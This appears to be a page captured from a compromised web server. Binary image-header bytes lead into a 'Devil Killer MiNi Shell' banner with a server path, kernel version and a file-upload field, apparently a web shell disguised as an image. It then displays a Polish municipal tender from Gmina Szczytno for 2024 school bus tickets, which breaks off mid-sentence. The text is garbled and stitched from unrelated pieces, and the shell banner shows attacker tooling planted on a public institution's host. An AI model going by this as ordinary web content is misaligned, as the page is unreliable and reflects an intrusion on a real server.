JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231108/0048370101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych w 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Szczytno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743261</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łomżyńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczytno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">12-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89 623 25 80</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">89 623 25 92</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugszczytno@ug.szczytno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ug.szczytno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych w 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4de57176-7e36-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00483701</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00007003/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowożenie uczniów do szkół – transport dla uczniów bilety miesięczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/843961 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_szczytno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej dostępnej pod adresem: https://platformazakupowa.pl/pn/ug_szczytno.<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod adresem: https://platformazakupowa.pl/pn/ug_szczytno/login. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z platformy zakupowej dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza Wyślij wiadomość. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: ugszczytno@ug.szczytno.pl lub kamilasamsel@ug.szczytno.pl.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem formularza Wyślij wiadomość jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: ugszczytno@ug.szczytno.pl. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Szczytno, ul. Łomżyńska 3, 12-100 Szczytno; tel. (89) 62 32 580, e-mail: ugszczytno@ug.szczytno.pl<br/>2) inspektorem ochrony danych osobowych w Gminie Szczytno jest Pan Kamil Maliszewski, kontakt: e-mail: iodo@ug.szczytno.pl, tel. (89) 62 32 583;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:	<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR.PFZ.271.25.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I - Zakup biletów miesięcznych dla uczniów zamieszkałych na terenie gminy Szczytno dojeżdżających do placówek oświatowych (Rudka, Wawrochy, Lipowiec) w 2024 roku<br/><br/>Adresy szkół i przedszkoli oraz godziny początku zajęć lekcyjnych: <br/>1)	Szkoła Podstawowa w Rudce, Rudka 10, - godz. 8:00; <br/>2)	Szkoła Podstawowa w Wawrochach, Wawrochy 12, - godz. 8:00;<br/>3)	Zespół Szkolno - Przedszkolny w Lipowcu, Lipowiec 48, - godz. 8:20.<br/><br/>Transport osób do szkół lub przedszkoli, liczba osób, maksymalny czas dojazdu ucznia z miejscowości zamieszkania do szkoły (przedszkola) oraz odległość w kilometrach od szkoły (przedszkola) do miejscowości:<br/>1) do Szkoły Podstawowej w Rudce na godz. 7:50 z miejscowości: Czarkowy Grąd (3,3 km) – 8 osób, Małdaniec (5,5 km) – 11 osób, Rudka (Lipnik) (8,00 km) – 8 osób, maksymalny czas dojazdu wynosi 25 minut licząc od miejscowości położonej najdalej od szkoły.<br/>2) do Szkoły Podstawowej w Wawrochach na godz. 7:50 z miejscowości: Młyńsko (5,5 km) - 2 osoby, Płozy (3,2 km) – 21 osób, Prusowy Borek (2,2 km) – 10 osób, Kolonia Wawrochy (1,5 km) – 1 osoba, maksymalny czas dojazdu wynosi 20 minut licząc od miejscowości położonej najdalej od szkoły.<br/>3) Zespół Szkolno – Przedszkolny w Lipowcu: <br/>- do Szkoły Podstawowej w Lipowcu na godz. 8:10 z miejscowości: Wały (4,6 km) – 12 osób, Płozy <br/>(10,0 km) – 2 osoby, Pużary (3,0 km) – 3 osoby, Piecuchy (8,1 km) – 13 osób, Łuka (5,4 km) – 11 osób, Mały Lipowiec (3,0 km) - 10 osób, Kolonia Lipowiec (2,0 km) – 16 osób, Gawrzyjałki (6,0 km) – 14 osób, maksymalny czas dojazdu wynosi 50 minut licząc od miejscowości położonej najdalej od szkoły.<br/>- do Gminnego Przedszkola w Lipowcu z miejscowości: Wały (4,6 km) – 2 osoby, Piecuchy (8,1 km) – 2 osoby, Łuka (5,4 km) – 5 osób, Wawrochy (9,0 km) – 1 osoba, Mały Lipowiec (3,0 km) – 3 osoby, Kolonia Lipowiec (2,0 km) – 2 osoby Gawrzyjałki (6,0 km) – 5 osób maksymalny czas dojazdu wynosi 40 minut licząc od miejscowości położonej najdalej od szkoły.<br/><br/>Powrót ze szkoły lub przedszkola: <br/>1)	ze Szkoły Podstawowej w Rudce do miejscowości: <br/>Poniedziałek:<br/>o godz. 13:45: Czarkowy Grąd – 4 osoby, Małdaniec – 7 osób, Lipnik – 2 osoby;<br/>o godz. 15:15: Czarkowy Grąd – 4 osoby, Małdaniec – 4 osoby, Lipnik – 6 osób. <br/>Wtorek: <br/>o godz. 13:45: Czarkowy Grąd – 4 osoby, Małdaniec – 7 osób, Lipnik – 2 osoby;<br/>o godz. 15:15: Czarkowy Grąd – 4 osoby, Małdaniec – 4 osoby, Lipnik – 6 osób. <br/>Środa: <br/>o godz. 13:45: Czarkowy Grąd – 4 osoby, Małdaniec – 7 osób, Lipnik – 2 osoby;<br/>o godz. 15:15: Czarkowy Grąd – 4 osoby, Małdaniec – 4 osoby, Lipnik – 6 osób. <br/>Czwartek: <br/>o godz. 13:45: Czarkowy Grąd – 4 osoby, Małdaniec – 7 osób, Lipnik – 2 osoby;<br/>o godz. 15:15: Czarkowy Grąd – 4 osoby, Małdaniec – 4 osoby, Lipnik – 6 osób. <br/>Piątek:<br/>o godz. 13:45: Czarkowy Grąd – 4 osoby, Małdaniec – 7 osób, Lipnik – 2 osoby;<br/>o godz. 15:15: Czarkowy Grąd – 4 osoby, Małdaniec – 4 osoby, Lipnik – 6 osób. <br/><br/>2)	ze Szkoły Podstawowej w Wawrochach do miejscowości: <br/>Poniedziałek:<br/>o godz. 13:25: Prusowy Borek – 8 osób, Płozy – 15 osób, Młyńsko – 1 osoba;<br/>o godz. 15:05: Prusowy Borek – 2 osoby, Płozy – 6 osób, Kolonia Wawrochy – 1 osoba, Młyńsko – 1 osoba. <br/>Wtorek: <br/>o godz. 13:25: Prusowy Borek – 8 osób, Płozy – 15 osób, Młyńsko – 2 osoby;<br/>o godz. 15:05: Prusowy Borek – 2 osoby, Płozy – 6 osób, Kolonia Wawrochy – 1 osoba. <br/>Środa: <br/>o godz. 13:25: Prusowy Borek – 8 osób, Płozy – 15 osób, Młyńsko – 2 osoby;<br/>o godz. 15:05: Prusowy Borek – 2 osoby, Płozy – 6 osób, Kolonia Wawrochy – 1 osoba. <br/>Czwartek: <br/>o godz. 13:25: Prusowy Borek – 10 osób, Płozy – 21 osób, Kolonia Wawrochy – 1 osoba, Młyńsko – 2 osoby. <br/>Piątek: <br/>o godz. 12:30: Prusowy Borek – 10 osób, Płozy – 21 osób, Kolonia Wawrochy – 1 osoba, Młyńsko – 2 osoby. <br/>Brak drugiego kursu w czwartki i piątki (sytuacja jednak może ulec zmianie)	<br/><br/>3)	z Zespołu Szkolno – Przedszkolnego w Lipowcu:<br/>ze Szkoły Podstawowej w Lipowcu do miejscowości:<br/>Poniedziałek:<br/>o godz. 13:00: Kolonia Lipowiec – 8 osób, Łuka – 9 osób, Lipowiec Mały – 9 osób, Pużary – 1 osoba, Gawrzyjałki - 14 osób, Piecuchy – 11 osób; Wały - 7 osób;<br/>o godz. 14:30: Kolonia Lipowiec – 6 osób, Łuka – 2 osoby, Lipowiec Mały – 3 osoby, Pużary – 2 osoby, Piecuchy – 2 osoby, Płozy – 2 osoby, Wały 5 osób. <br/>Wtorek: <br/>o godz. 13:00: Kolonia Lipowiec – 7 osób, Łuka – 7 osób, Lipowiec Mały – 4 osoby, Pużary – 1 osoba, Gawrzyjałki - 8 osób, Piecuchy – 6 osób, Wały - 7 osób;<br/>o godz. 14:30: Kolonia Lipowiec – 9 osób, Łuka – 4 osoby, Lipowiec Mały – 6 osób, Pużary – 2 osoby, Gawrzyjałki – 6 osób, Piecuchy – 7 osób, Płozy – 2 osoby, Wały 5 osób. <br/>Środa: <br/>o godz. 13:00: Kolonia Lipowiec – 4 osoby, Łuka – 6 osób, Lipowiec Mały – 9 osób, Pużary – 1 osoba, Gawrzyjałki - 8 osób, Piecuchy – 7 osób; Wały - 7 osób;<br/>o godz. 14:30: Kolonia Lipowiec – 10 osób, Łuka – 5 osób, Lipowiec Mały – 3 osoby, Pużary – 2 osoby, Gawrzyjałki – 6 osób, Piecuchy – 6 osób, Płozy – 2 osoby, Wały -5 osób. <br/>Czwartek: <br/>o godz. 13:00: Kolonia Lipowiec – 10 osób, Łuka – 7 osób, Lipowiec Mały – 8 osób, Pużary – 1 osoba, Gawrzyjałki - 9 osób, Piecuchy – 8 osób, Wały - 7 osób;<br/>o godz. 14:30: Kolonia Lipowiec – 4 osoby, Łuka – 4 osoby, Lipowiec Mały – 4 osoby, Pużary – 2 osoby, Gawrzyjałki – 5 osób, Piecuchy – 5 osób, Płozy – 2 osoby, Wały 5 osób.<br/>Piątek: <br/>o godz. 13:00: Kolonia Lipowiec – 4 osoby, Łuka – 7 osób, Lipowiec Mały – 3 osoby, Pużary – 1 osoba, Gawrzyjałki - 8 osób, Piecuchy – 7 osób, Wały - 4 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 12 osób, Łuka – 4 osoby, Lipowiec Mały – 7 osób, Pużary – 2 osoby, Gawrzyjałki – 6 osób, Piecuchy – 6 osób, Płozy – 2 osoby, Wały - 8 osób. <br/><br/>z Gminnego Przedszkola w Lipowcu z miejscowości: <br/>Poniedziałek:<br/>o godz. 13:00: Lipowiec Mały – 2 osoby, Gawrzyjałki – 4 osoby, Piecuchy – 2 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 2 osoby, Wały– 2 osoby, Łuka – 5 osób, Mały Lipowiec – 1 osoba, Gawrzyjałki – 1 osoba, Wawrochy – 1 osoba. <br/>Wtorek: <br/>o godz. 13:00: Lipowiec Mały – 2 osoby, Gawrzyjałki – 4osoby, Piecuchy – 2 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 2 osoby, Wały– 2 osoby, Łuka – 5 osób, Mały Lipowiec – 1 osoba, Gawrzyjałki – 1 osoba, Wawrochy – 1 osoba. <br/>Środa: <br/>o godz. 13:00: Lipowiec Mały – 2 osoby, Gawrzyjałki – 4osoby, Piecuchy – 2 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 2 osoby, Wały– 2 osoby, Łuka – 5 osób, Mały Lipowiec – 1 osoba, Gawrzyjałki – 1 osoba, Wawrochy – 1 osoba. <br/>Czwartek: <br/>o godz. 13:00: Lipowiec Mały – 2 osoby, Gawrzyjałki – 4osoby, Piecuchy – 2 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 2 osoby, Wały– 2 osoby, Łuka – 5 osób, Mały Lipowiec – 1 osoba, Gawrzyjałki – 1 osoba, Wawrochy – 1 osoba. <br/>Piątek: <br/>o godz. 13:00: Lipowiec Mały – 2 osoby, Gawrzyjałki – 4 osoby, Piecuchy – 2 osoby;<br/>o godz. 14:30: Kolonia Lipowiec – 2 osoby, Wały– 2 osoby, Łuka – 5 osób, Mały Lipowiec – 1 osoba, Gawrzyjałki – 1 osoba, Wawrochy – 1 osoba. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaplecze techniczne do obsługi zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda 